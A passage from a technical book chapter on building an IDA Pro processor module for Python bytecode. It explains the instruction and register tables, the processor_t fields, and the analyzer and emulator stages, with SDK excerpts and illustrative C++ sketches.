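    assert(n >= 1 && n <= 6);
    return (feature & (DEMO_CF_USE1 << (n - 1))) != 0;
}

// Hypothetical helper: summarize how execution continues after the instruction.
std::string describe_flow(std::uint32_t feature) {
    if (feature & DEMO_CF_STOP) return "stop";
    if (feature & DEMO_CF_CALL) return "call, then fall through";
    return "fall through";
}
```

A feature value of 0, as used for most of the Python instructions in this chapter, describes an instruction that touches no operands and simply falls through to its successor.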

Instructions need not be listed in any particular order. Specifically,

there is no need to order instructions according to their associated binary

opcodes, nor is there any requirement to have a one-to-one correspondence

between the instructions in this array and valid binary opcodes. The first and

last few lines of our example instruction array are shown here:

instruc_t Instructions[] = {

{"STOP_CODE", CF_STOP}, /* 0 */

{"POP_TOP", 0}, /* 1 */

{"ROT_TWO", 0}, /* 2 */

{"ROT_THREE", 0}, /* 3 */

{"DUP_TOP", 0}, /* 4 */

{"ROT_FOUR", 0}, /* 5 */

X {NULL, 0}, /* 6 */

...

{"CALL_FUNCTION_VAR_KW", CF_CALL}, /* 142 */

{"SETUP_WITH", 0}, /* 143 */

{NULL, 0}, /* 144 */

{"EXTENDED_ARG", 0}, /* 145 */

{"SET_ADD", 0}, /* 146 */

{"MAP_ADD", 0} /* 147 */

};

In our example, because Python byte code is so simple, we will be main-

taining a one-to-one correspondence between instructions and byte codes.

Note that in order to do so, some instruction records must act as filler when

an opcode is not defined, such as opcode 6 X in this case.

An associated set of enumerated constants is typically defined in ins.hpp

to provide a mapping from integers to instructions, as shown here:

enum python_opcodes {

STOP_CODE = 0,

POP_TOP = 1, //remove top item on stack

ROT_TWO = 2, //exchange top two items on stack

ROT_THREE = 3, //move top item below the 2nd and 3rd items

DUP_TOP = 4, //duplicate the top item on the stack

ROT_FOUR = 5, //move top item below the 2nd, 3rd, and 4th items

NOP = 9, //no operation

...

CALL_FUNCTION_VAR_KW = 142,

SETUP_WITH = 143,

EXTENDED_ARG = 145,

SET_ADD = 146,

MAP_ADD = 147,

PYTHON_LAST = 148

};

Here we have elected to explicitly assign a value to each enum, both for

clarity’s sake and because our sequence has gaps, a consequence of using

the actual Python opcodes as our instruction indexes. An

additional constant has also been added (PYTHON_LAST) to provide easy refer-

ence to the end of the list. With a list of instructions and associated integer

mapping in hand, we have sufficient information to initialize three fields of

LPH (our global processor_t). These three fields are described here:

int instruc_start; // integer code of the first instruction

int instruc_end; // integer code of the last instruction + 1

instruc_t *instruc; // array of instructions

We must initialize these fields with STOP_CODE, PYTHON_LAST, and Instructions,

respectively. Together these fields enable a processor module to quickly look

up the mnemonic for any instruction in the disassembly.
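
The following self-contained sketch shows how these three fields work together during a mnemonic lookup. The demo_instruc_t and demo_processor_t types are simplified stand-ins for the SDK structures, the table is only a seven-entry excerpt, and mnemonic_for is a hypothetical helper written for this illustration. It is not how the IDA kernel itself performs the lookup.

```cpp
#include <cassert>
#include <cstdint>

// Minimal stand-ins for the SDK types discussed above (not the real headers).
struct demo_instruc_t {
    const char *name;       // mnemonic, or nullptr for an unused opcode slot
    std::uint32_t feature;  // CF_xxx-style flags (placeholder values here)
};

struct demo_processor_t {
    int instruc_start;              // integer code of the first instruction
    int instruc_end;                // integer code of the last instruction + 1
    const demo_instruc_t *instruc;  // array of instructions
};

const std::uint32_t DEMO_CF_STOP = 0x0001;  // assumed value, see idp.hpp

// A seven-entry excerpt of the table. Slot 6 is filler because no opcode 6
// is defined.
const demo_instruc_t DemoInstructions[] = {
    {"STOP_CODE", DEMO_CF_STOP}, {"POP_TOP", 0}, {"ROT_TWO", 0},
    {"ROT_THREE", 0}, {"DUP_TOP", 0}, {"ROT_FOUR", 0}, {nullptr, 0},
};
const int DEMO_LAST = sizeof(DemoInstructions) / sizeof(DemoInstructions[0]);

const demo_processor_t DemoLPH = {0, DEMO_LAST, DemoInstructions};

// Hypothetical lookup: returns the mnemonic, or nullptr if the code is out
// of range or names a filler slot.
const char *mnemonic_for(const demo_processor_t &ph, int itype) {
    assert(ph.instruc != nullptr);
    if (itype < ph.instruc_start || itype >= ph.instruc_end) return nullptr;
    return ph.instruc[itype - ph.instruc_start].name;
}
```

Because instruc_end is one past the last valid code, the range test uses a strict comparison on the upper bound, which mirrors the way PYTHON_LAST is defined.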

For most processor modules, we also need to define a set of register names

and an associated set of enumerated constants for referring to them. If we

were writing an x86 processor module, we might begin with something like

the following, where for the sake of brevity we restrict ourselves to the basic

x86 register set:

static char *RegNames[] = {

"eax", "ebx", "ecx", "edx", "edi", "esi", "ebp", "esp",

"ax", "bx", "cx", "dx", "di", "si", "bp", "sp",

"al", "ah", "bl", "bh", "cl", "ch", "dl", "dh",

"cs", "ds", "es", "fs", "gs"

};

The RegNames array is often declared in a file named reg.cpp. This file is

also where the sample processor modules declare LPH, which enables RegNames

to be declared statically. The associated register enumeration would be

declared in a header file, usually named after the processor (perhaps x86.hpp

in this case), as follows:

enum x86_regs {

r_eax, r_ebx, r_ecx, r_edx, r_edi, r_esi, r_ebp, r_esp,

r_ax, r_bx, r_cx, r_dx, r_di, r_si, r_bp, r_sp,

r_al, r_ah, r_bl, r_bh, r_cl, r_ch, r_dl, r_dh,

r_cs, r_ds, r_es, r_fs, r_gs

};

Make certain that you maintain the proper correspondence between the

name array and the enumerated register constants. Together, the two allow a

processor module to quickly look up register names when formatting instruction operands.

These two data declarations are used to initialize additional fields in LPH:

int regsNum; // total number of registers

char **regNames; // array of register names

These two fields are often initialized with qnumber(RegNames) and RegNames,

respectively, where qnumber is a macro, defined in pro.h, that computes the

number of elements in a statically allocated array.
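
One way to guard the correspondence between the name array and the enumeration is to let the compiler check it. The sketch below is only an illustration: DEMO_QNUMBER is a local macro written in the spirit of qnumber, the register set is abbreviated, and the r_demo_count sentinel and reg_name helper are hypothetical additions that do not appear in the SDK.

```cpp
#include <cassert>
#include <cstddef>

// Element count of a statically allocated array, in the spirit of the
// qnumber macro (this local macro is a stand-in, not the SDK definition).
#define DEMO_QNUMBER(a) (sizeof(a) / sizeof((a)[0]))

enum demo_x86_regs {
    r_eax, r_ebx, r_ecx, r_edx, r_edi, r_esi, r_ebp, r_esp,
    r_cs, r_ds,
    r_demo_count   // hypothetical sentinel: total number of registers
};

static const char *const DemoRegNames[] = {
    "eax", "ebx", "ecx", "edx", "edi", "esi", "ebp", "esp",
    "cs", "ds"
};

// Compilation fails if a name is added without a matching constant,
// or a constant without a matching name.
static_assert(DEMO_QNUMBER(DemoRegNames) ==
                  static_cast<std::size_t>(r_demo_count),
              "register names and register constants are out of sync");

// Hypothetical helper: map a register constant to its name.
const char *reg_name(int reg) {
    assert(reg >= 0 && reg < r_demo_count);
    return DemoRegNames[reg];
}
```

A count check of this kind catches missing entries but not entries listed in the wrong order, so the two declarations still need to be kept side by side when they are edited.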

An IDA processor module is always required to specify information about

segment registers regardless of whether the actual processor uses segment

registers or not. Since the x86 utilizes segment registers, the preceding exam-

ple is fairly straightforward to configure. Segment registers are configured in

the following fields within a processor_t:

X// Segment register information (use virtual CS and DS registers if

// your processor doesn't have segment registers):

int regFirstSreg; // number of first segment register

int regLastSreg; // number of last segment register

int segreg_size; // size of a segment register in bytes

Y // If your processor does not use segment registers, You should define

// 2 virtual segment registers for CS and DS.

// Let's call them rVcs and rVds.

int regCodeSreg; // number of CS register

int regDataSreg; // number of DS register

To initialize our hypothetical x86 processor module, the previous five

fields would be initialized, in order, as follows:

r_cs, r_gs, 2, r_cs, r_ds

Note the comments, X and Y, regarding segment registers. IDA always

wants information about segment registers, even if your processor does not

use them. Returning to our Python example, we don’t have nearly as much

work to do in setting up register mappings, since the Python interpreter is a

stack-based architecture and there are no registers, but we do need to deal

with the segment register issue. The typical approach for doing so is to make

up names and enumerated values to represent a minimal set of segment registers (code and data). Basically, we are faking the existence of segment registers for no other reason than that IDA expects them. However, even

though IDA expects them, we are by no means obligated to use them, so we

simply ignore them in our processor module. For our Python processor, we

do the following:

//in reg.cpp

static char *RegNames[] = { "cs", "ds" };

//in python.hpp

enum py_registers { rVcs, rVds };

With these declarations in place, we can return to initialize the appropri-

ate fields within LPH using the following sequence of values:

rVcs, rVds, 0, rVcs, rVds

Before moving on to the implementation of any behavior in the Python

processor, we take some time to knock off some remaining low-hanging fruit

where initialization of the LPH structure is concerned. The first five fields of a

processor_t are described here:

int version; // should be IDP_INTERFACE_VERSION

int id; // IDP id, a PLFM_xxx value or self assigned > 0x8000

ulong flag; // Processor features, bitwise OR of PR_xxx values

int cnbits; // Number of bits in a byte for code segments (usually 8)

int dnbits; // Number of bits in a byte for data segments (usually 8)

The version field should look familiar, as it is also required in plug-in and

loader modules. For custom processor modules, the id field should be a self-

assigned value greater than 0x8000. The flag field describes various charac-

teristics of the processor module as a combination of PR_xxx flags defined

in idp.hpp. For the Python processor, we choose to specify only PR_RNAMESOK,

which allows register names to be used as location names (which is okay since

we have no registers), and PRN_DEC, which sets the default number display for-

mat to decimal. The remaining two fields, cnbits and dnbits, are each set to 8.

The Analyzer

At this point we have filled in enough of the LPH structure that we can begin

thinking about the first portion of a processor module that will execute—the

analyzer. In the example processor modules, the analyzer is typically imple-

mented by a function named ana (you may name it anything you like) in a file

named ana.cpp. The prototype for this function is very simple, as shown here:

int idaapi ana(void); //analyze one instruction and return the instruction length

You must initialize the u_ana member of the LPH object with a pointer to

your analyzer function. The analyzer’s job is to analyze a single instruction,

populate the global variable cmd with information about the instruction, and

return the length of the instruction. The analyzer should not make any

changes to the database.

The cmd variable is a global instance of an insn_t object. The insn_t class,

defined in ua.hpp, is used to describe a single instruction in the database. Its

declaration is shown here:

class insn_t {

public:

ea_t cs; // Current segment base paragraph. Set by kernel

ea_t ip; // Virtual address of instruction (within segment). Set by kernel

ea_t ea; // Linear address of the instruction. Set by kernel

X uint16 itype; // instruction enum value (not opcode!). Proc sets this in ana

Y uint16 size; // Size of instruction in bytes. Proc sets this in ana

union { // processor dependent field. Proc may set this

uint16 auxpref;

struct {

uchar low;

uchar high;

} auxpref_chars;

};

char segpref; // processor dependent field. Proc may set this

char insnpref; // processor dependent field. Proc may set this

Z op_t Operands[6]; // instruction operand info. Proc sets this in ana

char flags; // instruction flags. Proc may set this

};

Prior to calling your analyzer function, the IDA kernel (the core of IDA)

fills in the first three fields of the cmd object with the segmented and linear

address of the instruction. After that, it is the analyzer’s job to fill in the

rest. The essential fields for the analyzer to fill in are itype X, size Y, and

Operands Z. The itype field must be set to one of the enumerated instruction

type values discussed previously. The size field must be set to the total size

of the instruction (in bytes) and should be used as the return value of the

analyzer. If the instruction cannot be parsed, the analyzer should return a

size of zero. Finally, an instruction may have up to six operands, and the ana-

lyzer should fill in information about each operand used by the instruction.

The analyzer function is often implemented using a switch statement.

The first step in the analyzer is typically to request one or more (depending

on the processor) bytes from the instruction stream and use those bytes as

the switch test variable. The SDK offers special functions for use in the ana-

lyzer for the purpose of retrieving bytes from the instruction stream. These

functions are shown here:

//read one byte from current instruction location

uchar ua_next_byte(void);

//read two bytes from current instruction location

ushort ua_next_word(void);

//read four bytes from current instruction location

ulong ua_next_long(void);

//read eight bytes from current instruction location

ulonglong ua_next_qword(void);

The current instruction location is initially the same value contained

in cmd.ip. Each call to one of the ua_next_xxx functions has the side effect of

incrementing cmd.size according to the number of bytes requested by the

ua_next_xxx function being called (1, 2, 4, or 8). The retrieved bytes must

be decoded enough to assign the appropriate instruction type enumerated

value into the itype field, determine the number and type of any operands

required by the instruction, and then determine the overall length of the

instruction. As the decoding process progresses, additional instruction bytes

may be required until a complete instruction has been retrieved from the

instruction stream. As long as you utilize the ua_next_xxx functions, cmd.size

will be updated automatically for you, eliminating the need to keep track of

the number of bytes you have requested for a given instruction. From a high-

level perspective, the analyzer somewhat mimics the instruction fetch and

instruction decode phases employed in real CPUs. Mirroring real life, instruc-

tion decoding tends to be easier for processors with fixed instruction sizes, as

is often the case with RISC-style architectures, while instruction decoding

tends to be more complicated for processors that use variable-length instruc-

tions, such as the x86.
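
The bookkeeping performed by the ua_next_xxx functions can be imitated in a few lines. The following sketch is not SDK code: demo_stream is a hypothetical stand-in for the decoding state (the real functions read from the database and update the global cmd object), and the little-endian byte order used by demo_next_word is an assumption made for this example.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical stand-in for the decoding state.
struct demo_stream {
    const std::uint8_t *bytes;  // raw instruction bytes
    std::size_t length;         // number of valid bytes
    std::uint16_t size;         // bytes consumed so far (the role of cmd.size)
};

// Fetch one byte and advance the running size.
std::uint8_t demo_next_byte(demo_stream &s) {
    assert(s.size < s.length);
    return s.bytes[s.size++];
}

// Fetch two bytes, low byte first (an assumption for this sketch).
std::uint16_t demo_next_word(demo_stream &s) {
    std::uint16_t lo = demo_next_byte(s);
    std::uint16_t hi = demo_next_byte(s);
    return static_cast<std::uint16_t>(lo | (hi << 8));
}
```

After one call to demo_next_byte followed by one call to demo_next_word, the size member holds 3, which is exactly the value a decoder for a 3-byte instruction would want to return.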

Using the retrieved bytes, the analyzer must initialize one element in the

cmd.Operands array for each operand used by the instruction. Instruction oper-

ands are represented using instances of the op_t class, which is defined in

ua.hpp and summarized here:

class op_t {

public:

char n; // number of operand (0,1,2). Kernel sets this do not change!

optype_t type; // type of operand. Set in ana, See ua.hpp for values

// offset of operand relative to instruction start

char offb; //Proc sets this in ana, set to 0 if unknown

// offset to second part of operand (if present) relative to instruction start

char offo; //Proc sets this in ana, set to 0 if unknown

uchar flags; //Proc sets this in ana. See ua.hpp for possible values

char dtyp; // Specifies operand datatype. Set in ana. See ua.hpp for values

// The following unions keep other information about the operand

union {

uint16 reg; // number of register for type o_reg

uint16 phrase; // number of register phrase for types o_phrase and o_displ

// define numbers of phrases as you like

};

union { // value of operand for type o_imm or

uval_t value; // outer displacement (o_displ+OF_OUTER_DISP)

struct { // Convenience access to halves of value

uint16 low;

uint16 high;

} value_shorts;

};

union { // virtual address pointed or used by the operand

ea_t addr; // for types (o_mem,o_displ,o_far,o_near)

struct { // Convenience access to halves of addr

uint16 low;

uint16 high;

} addr_shorts;

};

//Processor dependent fields, use them as you like. Set in ana

union {

ea_t specval;

struct {

uint16 low;

uint16 high;

} specval_shorts;

};

char specflag1, specflag2, specflag3, specflag4;

};

Configuring an operand begins with setting the operand’s type field to

one of the enumerated optype_t constants defined in ua.hpp. An operand’s

type describes the source or destination of the operand data. In other words,

the type field roughly describes the addressing mode employed to access the

operand. Examples of operand types include o_reg, which means that the

operand is the content of a register; o_mem, which means the operand is a

memory address known at compile time; and o_imm, which means that the

operand is immediate data contained within the instruction.

The dtyp field specifies the size of the operand data. This field should

be set to one of the dt_xxx values specified in ua.hpp. Example values include

dt_byte for 8-bit data, dt_word for 16-bit data, and dt_dword for 32-bit data.

The following x86 instructions demonstrate the correspondence of some

of the primary operand datatypes to commonly used operands:

mov eax, 0x31337 ; o_reg(dt_dword), o_imm(dt_dword)

push word ptr [ebp - 12] ; o_displ(dt_word)

mov [0x08049130], bl ; o_mem(dt_byte), o_reg(dt_byte)

movzx eax, ax ; o_reg(dt_dword), o_reg(dt_word)

ret ; o_void(dt_void)

The manner in which the various unions within an op_t are used is dic-

tated by the value of the type field. For example, when an operand is type

o_imm, the immediate data value should be stored into the value field, and

when the operand type is o_reg, the register number (from the enumerated

set of register constants) should be stored into the reg field. Complete details

on where to store each piece of an instruction are contained in ua.hpp.
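
The idea that the operand type selects which field carries the payload can be sketched with a much smaller structure. Everything below is a simplified stand-in: demo_op models only three operand kinds, the fields are plain members rather than unions, and make_reg, make_imm, make_mem, and payload are hypothetical helpers rather than SDK functions.

```cpp
#include <cassert>
#include <cstdint>

// Simplified stand-ins for optype_t and op_t.
enum demo_optype { demo_o_void, demo_o_reg, demo_o_imm, demo_o_mem };

struct demo_op {
    demo_optype type;
    std::uint16_t reg;    // meaningful only for demo_o_reg
    std::uint32_t value;  // meaningful only for demo_o_imm
    std::uint32_t addr;   // meaningful only for demo_o_mem
};

// Hypothetical constructors that fill in only the field the type calls for.
demo_op make_reg(std::uint16_t reg) {
    demo_op op = {demo_o_reg, reg, 0, 0};
    return op;
}

demo_op make_imm(std::uint32_t value) {
    demo_op op = {demo_o_imm, 0, value, 0};
    return op;
}

demo_op make_mem(std::uint32_t addr) {
    demo_op op = {demo_o_mem, 0, 0, addr};
    return op;
}

// Return the payload that is valid for the operand's type.
std::uint32_t payload(const demo_op &op) {
    switch (op.type) {
        case demo_o_reg: return op.reg;
        case demo_o_imm: return op.value;
        case demo_o_mem: return op.addr;
        default:
            assert(op.type == demo_o_void);  // no payload for a void operand
            return 0;
    }
}
```

With these helpers, the two operands of mov eax, 0x31337 would be built as make_reg(0), assuming register number 0 denotes eax, and make_imm(0x31337).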

Note that none of the fields within an op_t describe whether the operand

is being used as a source or a destination for data. In fact, it is not the ana-

lyzer’s job to determine such things. The canonical flags specified in the

instruction names array are used in a later stage in the processor to deter-

mine exactly how an operand is being used.

Several of the fields within both the insn_t class and the op_t class are

described as processor dependent, which means that you may use those fields for

any purpose you wish. Such fields are often used for storing information that

does not fit neatly into one of the other fields within these classes. The pro-

cessor-dependent fields are also a convenient mechanism for passing infor-

mation along to later stages of the processor so that those stages do not need

to replicate the work of the analyzer.

With all of the ground rules for an analyzer covered, we can take a stab

at crafting a minimal analyzer for Python byte code. Python byte code is very

straightforward. Python opcodes are 1 byte long. Opcodes less than 90 have

no operands, while opcodes greater than or equal to 90 each have a 2-byte

operand. Our basic analyzer is shown here:

#define HAVE_ARGUMENT 90

int idaapi py_ana(void) {

cmd.itype = ua_next_byte(); //opcodes ARE itypes for us (updates cmd.size)

if (cmd.itype >= PYTHON_LAST) return 0; //invalid instruction

if (Instructions[cmd.itype].name == NULL) return 0; //invalid instruction

if (cmd.itype < HAVE_ARGUMENT) { //no operands

cmd.Op1.type = o_void; //Op1 is a macro for Operands[0] (see ua.hpp)

cmd.Op1.dtyp = dt_void;

}

else { //instruction must have two bytes worth of operand data

if (flags[cmd.itype] & (HAS_JREL | HAS_JABS)) {

cmd.Op1.type = o_near; //operand refers to a code location

}

else {

cmd.Op1.type = o_mem; //operand refers to memory (sort of)

}

cmd.Op1.offb = 1; //operand offset is 1 byte into instruction

cmd.Op1.dtyp = dt_dword; //No sizes in python so we just pick something

cmd.Op1.value = ua_next_word(); //fetch the operand word (updates cmd.size)

cmd.auxpref = flags[cmd.itype]; //save flags for later stages

if (flags[cmd.itype] & HAS_JREL) {

//compute relative jump target

cmd.Op1.addr = cmd.ea + cmd.size + cmd.Op1.value;

}

else if (flags[cmd.itype] & HAS_JABS) {

cmd.Op1.addr = cmd.Op1.value; //save absolute address

}

else if (flags[cmd.itype] & HAS_CALL) {

//target of call is on the stack in Python, the operand indicates

//how many arguments are on the stack, save these for later stages

cmd.Op1.specflag1 = cmd.Op1.value & 0xFF; //positional parms

cmd.Op1.specflag2 = (cmd.Op1.value >> 8) & 0xFF; //keyword parms

}

} //end of the two-byte operand case

return cmd.size;

}

For the Python processor module, we have elected to create an addi-

tional array of flags, one per instruction, used to supplement (and in some

cases replicate) the canonical features of each instruction. The HAS_JREL,

HAS_JABS, and HAS_CALL flags were defined for use in our flags array. We use

these flags to indicate whether an instruction operand represents a relative

jump offset, an absolute jump target, or the description of a function call

stack, respectively. Explaining every detail of the analysis phase is difficult

without descending into the operation of the Python interpreter, so we sum-

marize the analyzer here and through comments in the preceding code,

remembering that the analyzer’s job is to dissect a single instruction:

1. The analyzer gets the next instruction byte from the instruction stream

and determines whether the byte is a valid Python opcode.

2. If the instruction has no operands, cmd.Operands[0] (cmd.Op1) is initialized

to o_void.

3. If the instruction has an operand, cmd.Operands[0] is initialized to reflect

the type of the operand. Several processor-specific fields are used to

carry information forward to later stages in the processor module.

4. The length of the instruction is returned to the caller.
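
The steps above can be exercised outside of IDA with a stripped-down decoder that works on a plain byte buffer. This is a sketch under several assumptions: demo_insn is a hypothetical record standing in for the relevant fields of cmd, only the relative jump JUMP_FORWARD (opcode 110 in Python 2.x) receives special treatment, the operand is assumed to be stored low byte first, and the validity check against the instruction table is omitted for brevity.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

const int DEMO_HAVE_ARGUMENT = 90;  // opcodes >= 90 carry a 2-byte operand
const int DEMO_JUMP_FORWARD = 110;  // relative jump opcode in Python 2.x

// Hypothetical result record standing in for the fields of cmd.
struct demo_insn {
    int itype;             // the opcode doubles as the instruction type
    int size;              // total length in bytes; 0 means "could not decode"
    std::uint16_t value;   // raw operand, if any
    std::uint32_t target;  // computed target for relative jumps, else 0
};

// Decode the instruction at offset ea within code[0..len).
demo_insn demo_decode(const std::uint8_t *code, std::size_t len,
                      std::uint32_t ea) {
    assert(code != nullptr);
    demo_insn insn = {0, 0, 0, 0};
    if (ea >= len) return insn;             // nothing left to decode
    insn.itype = code[ea];
    if (insn.itype < DEMO_HAVE_ARGUMENT) {  // no operand
        insn.size = 1;
        return insn;
    }
    if (len - ea < 3) return insn;          // operand is truncated
    insn.value = static_cast<std::uint16_t>(code[ea + 1] | (code[ea + 2] << 8));
    insn.size = 3;
    if (insn.itype == DEMO_JUMP_FORWARD) {
        // The offset is relative to the address of the following instruction.
        insn.target = ea + insn.size + insn.value;
    }
    return insn;
}
```

Returning a size of zero for a truncated instruction follows the same convention the analyzer uses to report an instruction that cannot be parsed.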

More sophisticated instruction sets are almost certain to require more

complex analyzer stages. Overall, however, any analyzer’s behavior may be

generalized as follows:

1. Read enough bytes from the instruction stream to determine whether

the instruction is valid and to map the instruction to one of the enumer-

ated instruction type constants, which is then saved in cmd.itype. This

operation is often performed using a large switch statement to categorize

instruction opcodes.

2. Read any additional bytes required to properly determine the number

of operands required by the instruction, the addressing modes in use

by those operands, and the individual components of each operand

(registers and immediate data). This data is used to populate elements

of the cmd.Operands array. This operation may be factored into a separate

operand-decoding function.

3. Return the total length of the instruction and its operands.

Strictly speaking, once an instruction has been dissected, IDA has enough

information to generate an assembly language representation of that instruc-

tion. In order to generate cross-references, facilitate the recursive descent

process, and monitor the behavior of the program stack pointer, IDA must

obtain additional details about the behavior of each instruction. This is the

job of the emulator stage of an IDA processor module.

The Emulator

Whereas the analyzer stage is concerned with the structure of a single

instruction, the emulator stage is concerned with the behavior of a single

instruction. In IDA example processor modules, the emulator is typically

implemented by a function named emu (you may name it anything you like)

in a file named emu.cpp. Like the ana function, the prototype for this function

is very simple, as shown here:

int idaapi emu(void); //emulate one instruction

According to idp.hpp, the emu function is supposed to return the length of

the instruction that was emulated; however, the majority of sample emulators

seem to return the value 1.

You must initialize the u_emu member of the LPH object with a pointer to

your emulator function. By the time emu is called, cmd has been initialized by

the analyzer. The emulator’s primary purpose is to create code and data

cross-references based on the behavior of the instruction described by cmd.

The emulator is also the place to keep track of any changes to the stack

pointer and create local variables based on observed access to a function’s

stack frame. Unlike the analyzer, the emulator may change the database.

Determining whether an instruction results in the creation of any cross-

references is typically done by examining the instruction’s canonical features

in conjunction with the type field of the instruction’s operands. A very basic

emulator function for an instruction set whose instructions may take up to

two operands, which is representative of many of the SDK examples, is shown

here:

void TouchArg(op_t &op, int isRead); //Processor author writes this

int idaapi emu() {

ulong feature = cmd.get_canon_feature(); //get the instruction's CF_xxx flags

if (feature & CF_USE1) TouchArg(cmd.Op1, 1);

if (feature & CF_USE2) TouchArg(cmd.Op2, 1);

if (feature & CF_CHG1) TouchArg(cmd.Op1, 0);

if (feature & CF_CHG2) TouchArg(cmd.Op2, 0);

if ((feature & CF_STOP) == 0) { //instruction doesn't stop

//add code cross ref to next sequential instruction

ua_add_cref(0, cmd.ea + cmd.size, fl_F);

}

return 1;

}

For each instruction operand, the preceding function examines the

instruction’s canonical features to determine whether a cross-reference of

any kind should be generated. In this example, a function named TouchArg

examines a single operand to determine what type of cross-reference should

be generated and handles the details of generating the correct cross-reference.

When generating cross-references from your emulator, you should use the

cross-reference-creation functions declared in ua.hpp rather than in xref.hpp.

The following rough guidelines may be used in determining what type of

cross-references to generate.

- If the operand type is o_imm, the operation is a read (isRead is true), and the operand value is a pointer, create an offset reference. Determine whether an operand is a pointer by calling the isOff function, for example, isOff(uFlag, op.n). Add an offset cross-reference using ua_add_off_drefs, for example, ua_add_off_drefs(op, dr_O);.

- If the operand type is o_displ and the operand value is a pointer, create an offset cross-reference with a read or write cross-reference type as appropriate, for example, ua_add_off_drefs(op, isRead ? dr_R : dr_W);.

- If the operand type is o_mem, add a data cross-reference with a read or write cross-reference type as appropriate using ua_add_dref, for example, ua_add_dref(op.offb, op.addr, isRead ? dr_R : dr_W);.

- If the operand type is o_near, add a code cross-reference with a jump or call cross-reference type as appropriate using ua_add_cref, for example, ua_add_cref(op.offb, op.addr, feature & CF_CALL ? fl_CN : fl_JN);.
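
The decision logic in these guidelines can be separated from the SDK calls and tested on its own. The sketch below only classifies; it never creates a cross-reference. The xr_optype, xr_kind, and xr_op types are simplified stand-ins, the is_pointer member takes the place of the isOff test, and classify_xref is a hypothetical function that a TouchArg implementation might consult before calling the real ua_add_xxx functions.

```cpp
#include <cassert>

// Simplified stand-ins; the real constants come from ua.hpp and xref.hpp.
enum xr_optype { xr_o_imm, xr_o_displ, xr_o_mem, xr_o_near, xr_o_other };

enum xr_kind {
    xr_none,
    xr_offset,        // offset reference from an immediate
    xr_offset_read,   // offset reference, read access
    xr_offset_write,  // offset reference, write access
    xr_data_read,
    xr_data_write,
    xr_code_jump,
    xr_code_call
};

struct xr_op {
    xr_optype type;
    bool is_pointer;  // stands in for the isOff() test on the operand
};

// Hypothetical classifier following the guidelines above.
xr_kind classify_xref(const xr_op &op, bool isRead, bool isCall) {
    switch (op.type) {
        case xr_o_imm:
            return (isRead && op.is_pointer) ? xr_offset : xr_none;
        case xr_o_displ:
            if (!op.is_pointer) return xr_none;
            return isRead ? xr_offset_read : xr_offset_write;
        case xr_o_mem:
            return isRead ? xr_data_read : xr_data_write;
        case xr_o_near:
            return isCall ? xr_code_call : xr_code_jump;
        default:
            assert(op.type == xr_o_other);  // guard against unhandled kinds
            return xr_none;
    }
}
```

Keeping the classification separate from the side effects makes it easier to check each guideline in isolation before wiring the function into an emulator.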

The emulator is also responsible for reporting on the behavior of the stack

pointer register. The emulator should use the add_auto_stkpnt2 function to

inform IDA that an instruction changed the value of the stack pointer. The

prototype for add_auto_stkpnt2 is shown here:

bool add_auto_stkpnt2(func_t *pfn, ea_t ea, sval_t delta);

The pfn pointer should point to the function that contains the address

being emulated. If pfn is NULL, it will be automatically determined by IDA.

The ea parameter should specify the end address (typically cmd.ea + cmd.size)

for the instruction that changes the stack pointer. The delta parameter is

used to specify the number of bytes by which the stack pointer grows or

shrinks. Use negative deltas when the stack is growing (such as after a push

instruction) and positive deltas when the stack is shrinking (such as after a

pop instruction). A simple 4-byte adjustment to the stack pointer in conjunc-

tion with a push operation might be emulated as follows:

if (cmd.itype == X86_push) {

add_auto_stkpnt2(NULL, cmd.ea + cmd.size, -4);

}

In order to maintain an accurate record of stack pointer behavior, the

emulator should be able to recognize and emulate all instructions that

change the stack pointer, not just the simple push and pop cases. A more

complex example of tracking the stack pointer occurs when a function

allocates its local variables by subtracting a constant value from the stack

pointer. This case is illustrated here:

//handle cases such as: sub esp, 48h

if (cmd.itype == X86_sub && cmd.Op1.type == o_reg

&& cmd.Op1.reg == r_esp && cmd.Op2.type == o_imm) {

add_auto_stkpnt2(NULL, cmd.ea + cmd.size, -cmd.Op2.value);

}
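
To see how these deltas accumulate, consider the following stand-alone sketch. The sp_insn record and its three instruction kinds are hypothetical simplifications, and nothing here calls into the SDK. The functions compute the same signed values that would be passed to add_auto_stkpnt2 and keep a running total.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical, simplified instruction record for this sketch.
enum sp_itype { sp_push, sp_pop, sp_sub_esp_imm, sp_other };

struct sp_insn {
    sp_itype itype;
    std::uint32_t imm;  // immediate operand, used only by sp_sub_esp_imm
};

// Signed change to the stack pointer caused by one instruction:
// negative when the stack grows, positive when it shrinks.
std::int32_t sp_delta(const sp_insn &insn) {
    switch (insn.itype) {
        case sp_push: return -4;
        case sp_pop:  return 4;
        case sp_sub_esp_imm:
            assert(insn.imm <= 0x7FFFFFFF);  // keep the cast well defined
            return -static_cast<std::int32_t>(insn.imm);
        default:      return 0;
    }
}

// Running stack-pointer offset after each instruction in a sequence.
std::vector<std::int32_t> sp_trace(const std::vector<sp_insn> &code) {
    std::vector<std::int32_t> trace;
    std::int32_t sp = 0;
    for (const sp_insn &insn : code) {
        sp += sp_delta(insn);
        trace.push_back(sp);
    }
    return trace;
}
```

For the sequence push, sub esp, 48h, pop, the running offsets are -4, -76, and -72, which is the kind of record IDA builds up from successive add_auto_stkpnt2 calls.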

Because CPU architectures vary significantly from one CPU to another,

it is not possible for IDA (or any other program for that matter) to account

for every possible way that an operand may be formed or every way that an

instruction may reference other instructions or data. As a result, there is no

precise cookbook recipe for building your emulator module. Reading through

existing processor module source code along with a lot of trial and error may

be required before your emulator does everything you want it to do.

The emulator for our example Python processor is shown here:

int idaapi py_emu(void) {

//We can only resolve target addresses for relative jumps

if (cmd.auxpref & HAS_JREL) { //test the flags set by the analyzer

ua_add_cref(cmd.Op1.offb, cmd.Op1.addr, fl_JN);

}

//Add the sequential flow as long as CF_STOP is not set

if((cmd.get_canon_feature() & CF_STOP) == 0) {

//cmd.ea + cmd.size computes the address of the next instruction

ua_add_cref(0, cmd.ea + cmd.size, fl_F);

}

return 1;

}

Again, owing to the architecture of the Python interpreter, we are

severely limited in the types of cross-references that we can generate. In

Python byte code, there is no concept of a memory address for data items,

and the absolute address of each instruction can be determined only by

parsing metainformation contained in the compiled Python (.pyc) file. Data

items are either stored in tables and referenced by index values or they are

stored on the program stack, where they cannot be directly referenced. Here

again, while we can directly read data item index values from instruction

operands, we cannot know the structure of the tables that hold the data

unless we have parsed additional metainformation contained in the .pyc file.

In our processor, we can compute only the target of relative jump instruc-

